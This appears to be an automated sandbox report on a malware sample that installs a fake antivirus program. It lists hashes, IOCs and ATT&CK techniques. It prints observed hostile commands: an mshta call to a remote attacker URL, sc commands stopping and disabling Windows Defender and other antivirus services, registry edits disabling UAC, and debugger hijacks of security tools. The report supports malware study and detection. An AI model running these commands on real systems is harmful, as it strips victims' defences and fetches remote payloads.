Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
125s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
18/08/2024, 13:45
Static task
static1
Behavioral task
behavioral1
Sample
4f0bc8c887bae4211b8eccdbf08cc04645c08eacb4e0b0e94c511ebe50c9a3ee.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
4f0bc8c887bae4211b8eccdbf08cc04645c08eacb4e0b0e94c511ebe50c9a3ee.exe
Resource
win10v2004-20240802-en
General
-
Target
4f0bc8c887bae4211b8eccdbf08cc04645c08eacb4e0b0e94c511ebe50c9a3ee.exe
-
Size
2.0MB
-
MD5
a6dfa21610948c33426dd4cb689e060e
-
SHA1
86d0f9265cbb7cb3eef70fd10fc25143fe1592ca
-
SHA256
4f0bc8c887bae4211b8eccdbf08cc04645c08eacb4e0b0e94c511ebe50c9a3ee
-
SHA512
bcef93060472971c961997fdea0ead573d01d8c81c6f29f19fe581df33220295650ce2574a97dbc034d7642db77450442585ca8e8982b9eb339a2ca4dead5635
-
SSDEEP
49152:DCqEdrs/oMaIbycp34Kd9lz04CMxD23I4TsY5l264VfdHW9:Dkd4xIs9tcMye64Vfs9
Malware Config
Extracted
http://galaint.online-secure-pay.info/?0=112&1=1&2=1&3=33&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=njkvhbkmrs&14=1
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Protector-iqqk.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Protector-iqqk.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" Protector-iqqk.exe -
Disables taskbar notifications via registry modification
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mslaugh.exe\Debugger = "svchost.exe" Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ntxconfig.exe\Debugger = "svchost.exe" Protector-iqqk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\support.exe Protector-iqqk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vswinntse.exe Protector-iqqk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ave32.exe Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmgrdian.exe\Debugger = "svchost.exe" Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp32.exe\Debugger = "svchost.exe" Protector-iqqk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avpcc.exe Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bipcpevalsetup.exe\Debugger = "svchost.exe" Protector-iqqk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd32.exe Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hwpe.exe\Debugger = "svchost.exe" Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Identity.exe\Debugger = "svchost.exe" Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgrsx.exe\Debugger = "svchost.exe" Protector-iqqk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgw.exe Protector-iqqk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\localnet.exe Protector-iqqk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IEShow.exe Protector-iqqk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navnt.exe Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navwnt.exe\Debugger = "svchost.exe" Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spywarexpguard.exe\Debugger = "svchost.exe" Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vettray.exe\Debugger = "svchost.exe" Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\amon9x.exe\Debugger = "svchost.exe" Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\homeav2010.exe\Debugger = "svchost.exe" Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lockdown.exe\Debugger = "svchost.exe" Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\window.exe\Debugger = "svchost.exe" Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mssys.exe\Debugger = "svchost.exe" Protector-iqqk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sperm.exe Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\system.exe\Debugger = "svchost.exe" Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tvmd.exe\Debugger = "svchost.exe" Protector-iqqk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgserv9.exe Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\blackd.exe\Debugger = "svchost.exe" Protector-iqqk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wradmin.exe Protector-iqqk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\~1.exe Protector-iqqk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\intdel.exe Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tgbob.exe\Debugger = "svchost.exe" Protector-iqqk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\~2.exe Protector-iqqk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\About.exe Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bipcp.exe\Debugger = "svchost.exe" Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\au.exe\Debugger = "svchost.exe" Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\etrustcipe.exe\Debugger = "svchost.exe" Protector-iqqk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\idle.exe Protector-iqqk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navlu32.exe Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pop3trap.exe\Debugger = "svchost.exe" Protector-iqqk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSUNMain.exe Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdwarePrj.exe\Debugger = "svchost.exe" Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashMaiSv.exe\Debugger = "svchost.exe" Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\savenow.exe\Debugger = "svchost.exe" Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vbcmserv.exe\Debugger = "svchost.exe" Protector-iqqk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pcscan.exe Protector-iqqk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TPSrv.exe Protector-iqqk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vir-help.exe Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vswinperse.exe\Debugger = "svchost.exe" Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wimmun32.exe\Debugger = "svchost.exe" Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winav.exe\Debugger = "svchost.exe" Protector-iqqk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashMaiSv.exe Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashServ.exe\Debugger = "svchost.exe" Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wupdater.exe\Debugger = "svchost.exe" Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\~1.exe\Debugger = "svchost.exe" Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\platin.exe\Debugger = "svchost.exe" Protector-iqqk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vpc42.exe Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wupdt.exe\Debugger = "svchost.exe" Protector-iqqk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ctrl.exe\Debugger = "svchost.exe" Protector-iqqk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dop.exe Protector-iqqk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fsma32.exe Protector-iqqk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\loader.exe Protector-iqqk.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation 4f0bc8c887bae4211b8eccdbf08cc04645c08eacb4e0b0e94c511ebe50c9a3ee.exe Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation 46idba4mb3c6wsk.exe Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation d4j2qm7zd0c38ni.exe -
Executes dropped EXE 3 IoCs
pid Process 1412 46idba4mb3c6wsk.exe 3324 d4j2qm7zd0c38ni.exe 1472 Protector-iqqk.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Inspector = "C:\\Users\\Admin\\AppData\\Roaming\\Protector-iqqk.exe" Protector-iqqk.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Protector-iqqk.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\services.msc Protector-iqqk.exe File opened for modification C:\Windows\SysWOW64\eventvwr.msc Protector-iqqk.exe File opened for modification C:\Windows\SysWOW64\diskmgmt.msc Protector-iqqk.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3468 sc.exe 736 sc.exe 4884 sc.exe 2880 sc.exe 3960 sc.exe 1600 sc.exe 2200 sc.exe 2036 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4f0bc8c887bae4211b8eccdbf08cc04645c08eacb4e0b0e94c511ebe50c9a3ee.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 46idba4mb3c6wsk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d4j2qm7zd0c38ni.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Protector-iqqk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312 Protector-iqqk.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312\iexplore.exe = "1" Protector-iqqk.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3324 d4j2qm7zd0c38ni.exe Token: SeShutdownPrivilege 3324 d4j2qm7zd0c38ni.exe Token: SeDebugPrivilege 1472 Protector-iqqk.exe Token: SeShutdownPrivilege 1472 Protector-iqqk.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe -
Suspicious use of SendNotifyMessage 4 IoCs
pid Process 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 3324 d4j2qm7zd0c38ni.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe 1472 Protector-iqqk.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 3580 wrote to memory of 1412 3580 4f0bc8c887bae4211b8eccdbf08cc04645c08eacb4e0b0e94c511ebe50c9a3ee.exe 86 PID 3580 wrote to memory of 1412 3580 4f0bc8c887bae4211b8eccdbf08cc04645c08eacb4e0b0e94c511ebe50c9a3ee.exe 86 PID 3580 wrote to memory of 1412 3580 4f0bc8c887bae4211b8eccdbf08cc04645c08eacb4e0b0e94c511ebe50c9a3ee.exe 86 PID 1412 wrote to memory of 3324 1412 46idba4mb3c6wsk.exe 87 PID 1412 wrote to memory of 3324 1412 46idba4mb3c6wsk.exe 87 PID 1412 wrote to memory of 3324 1412 46idba4mb3c6wsk.exe 87 PID 3324 wrote to memory of 1472 3324 d4j2qm7zd0c38ni.exe 88 PID 3324 wrote to memory of 1472 3324 d4j2qm7zd0c38ni.exe 88 PID 3324 wrote to memory of 1472 3324 d4j2qm7zd0c38ni.exe 88 PID 3324 wrote to memory of 1968 3324 d4j2qm7zd0c38ni.exe 89 PID 3324 wrote to memory of 1968 3324 d4j2qm7zd0c38ni.exe 89 PID 3324 wrote to memory of 1968 3324 d4j2qm7zd0c38ni.exe 89 PID 1472 wrote to memory of 4428 1472 Protector-iqqk.exe 91 PID 1472 wrote to memory of 4428 1472 Protector-iqqk.exe 91 PID 1472 wrote to memory of 4428 1472 Protector-iqqk.exe 91 PID 1472 wrote to memory of 3468 1472 Protector-iqqk.exe 100 PID 1472 wrote to memory of 3468 1472 Protector-iqqk.exe 100 PID 1472 wrote to memory of 3468 1472 Protector-iqqk.exe 100 PID 1472 wrote to memory of 2036 1472 Protector-iqqk.exe 101 PID 1472 wrote to memory of 2036 1472 Protector-iqqk.exe 101 PID 1472 wrote to memory of 2036 1472 Protector-iqqk.exe 101 PID 1472 wrote to memory of 2200 1472 Protector-iqqk.exe 103 PID 1472 wrote to memory of 2200 1472 Protector-iqqk.exe 103 PID 1472 wrote to memory of 2200 1472 Protector-iqqk.exe 103 PID 1472 wrote to memory of 1600 1472 Protector-iqqk.exe 104 PID 1472 wrote to memory of 1600 1472 Protector-iqqk.exe 104 PID 1472 wrote to memory of 1600 1472 Protector-iqqk.exe 104 PID 1472 wrote to memory of 3960 1472 Protector-iqqk.exe 106 PID 1472 wrote to memory of 3960 1472 Protector-iqqk.exe 106 PID 1472 wrote to memory of 3960 1472 Protector-iqqk.exe 106 PID 1472 wrote to memory of 2880 1472 Protector-iqqk.exe 107 PID 1472 wrote to memory of 2880 1472 Protector-iqqk.exe 107 PID 1472 wrote to memory of 2880 1472 Protector-iqqk.exe 107 PID 1472 wrote to memory of 736 1472 Protector-iqqk.exe 108 PID 1472 wrote to memory of 736 1472 Protector-iqqk.exe 108 PID 1472 wrote to memory of 736 1472 Protector-iqqk.exe 108 PID 1472 wrote to memory of 4884 1472 Protector-iqqk.exe 109 PID 1472 wrote to memory of 4884 1472 Protector-iqqk.exe 109 PID 1472 wrote to memory of 4884 1472 Protector-iqqk.exe 109 -
System policy modification 1 TTPs 4 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Protector-iqqk.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" Protector-iqqk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System Protector-iqqk.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Protector-iqqk.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\4f0bc8c887bae4211b8eccdbf08cc04645c08eacb4e0b0e94c511ebe50c9a3ee.exe"C:\Users\Admin\AppData\Local\Temp\4f0bc8c887bae4211b8eccdbf08cc04645c08eacb4e0b0e94c511ebe50c9a3ee.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3580 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\46idba4mb3c6wsk.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\46idba4mb3c6wsk.exe" -e -ps10n43n4ttbw1yn2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\d4j2qm7zd0c38ni.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\d4j2qm7zd0c38ni.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3324 -
C:\Users\Admin\AppData\Roaming\Protector-iqqk.exeC:\Users\Admin\AppData\Roaming\Protector-iqqk.exe4⤵
- UAC bypass
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1472 -
C:\Windows\SysWOW64\mshta.exemshta.exe "http://galaint.online-secure-pay.info/?0=112&1=1&2=1&3=33&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=njkvhbkmrs&14=1"5⤵
- System Location Discovery: System Language Discovery
PID:4428
-
-
C:\Windows\SysWOW64\sc.exesc stop WinDefend5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3468
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2036
-
-
C:\Windows\SysWOW64\sc.exesc stop msmpsvc5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2200
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1600
-
-
C:\Windows\SysWOW64\sc.exesc config ekrn start= disabled5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3960
-
-
C:\Windows\SysWOW64\sc.exesc stop AntiVirService5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2880
-
-
C:\Windows\SysWOW64\sc.exesc config AntiVirService start= disabled5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:736
-
-
C:\Windows\SysWOW64\sc.exesc config AntiVirSchedulerService start= disabled5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4884
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\D4J2QM~1.EXE" >> NUL4⤵
- System Location Discovery: System Language Discovery
PID:1968
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
1Indicator Removal
1File Deletion
1Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.0MB
MD5cbe96899d1e0db4d9d910d6f4c831782
SHA1d0fa845fa7efae9c77e0067668f99dbc11ad887f
SHA256b593450a23937e30b89b1f303d56d0c75fc7dc1996e9ea143d0d7c00196ff62d
SHA5127291e8fb87b6ebd8872a50bbfbc38511f1aa2228e12be1ba05d00f32816881ef5c203488fbe50a9cdd96934f92037768b3b347888fa84113ce7f25a051cafe8c
-
Filesize
1.9MB
MD51e0b71526162ab0c95a404aa31186d3b
SHA11e06e8b5a61cb2689a4b10b6ba970f1a01a20745
SHA2567d644f20a247acfc6c0aaf0d76fcd82f2f28d99dbcb3227538a1914469d54ffa
SHA512f23ea2b277862befbd1db50c97926d5c6d0334d8d97eaba998296a254c3363a9a7a048a6799c54c1957c6cef0dfcb2b1fa1058377a2d730ff06b844a5e6f86ce